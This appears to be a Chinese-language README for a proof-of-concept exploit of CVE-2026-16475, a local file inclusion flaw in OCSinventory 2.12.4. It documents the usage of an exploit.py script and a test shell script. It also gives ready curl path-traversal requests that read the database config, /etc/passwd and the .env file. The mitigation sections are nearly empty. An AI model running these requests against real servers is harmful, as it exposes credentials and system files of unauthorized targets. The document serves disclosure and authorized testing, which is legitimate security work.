OCSinventory 2.12.4 中的本地文件包含(LFI)漏洞
CVE 编号: CVE-2026-16475
CVSS 评分: 6.9(中危)
CWE: CWE-98(PHP 程序中对包含/引用语句的文件名控制不当)
受影响版本: OCSinventory 2.12.4
状态: 已在最新版本中修复
/ajax/teledeployoptions.php 端点存在本地文件包含(LFI)漏洞,原因是 linkedoptions 参数在用于动态 XML 文件包含操作之前未经过适当的净化处理。
该端点旨在加载 XML 配置文件,但未能正确验证 linkedoptions 参数,从而允许路径遍历攻击。
未经身份验证的远程攻击者可以利用此漏洞:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
选项:
-u, --url - 目标 URL(必填)-v, --verbose - 详细输出-o, --output - 将成功读取的内容保存到文件示例:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
编辑脚本中的 BASE_URL 变量:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
对于用户:
对于开发人员:
basename() 或类似函数来防止路径遍历注意: CVE-2026-16475 由 INCIBE 协调,可能尚未收录在 NVD 中。请查阅 INCIBE 来源以获取权威信息。
仅供教育和授权测试使用
完整的法律声明请参阅 DISCLAIMER.md。
Adrián Ferrer Tarí
通过 INCIBE 协调的负责任披露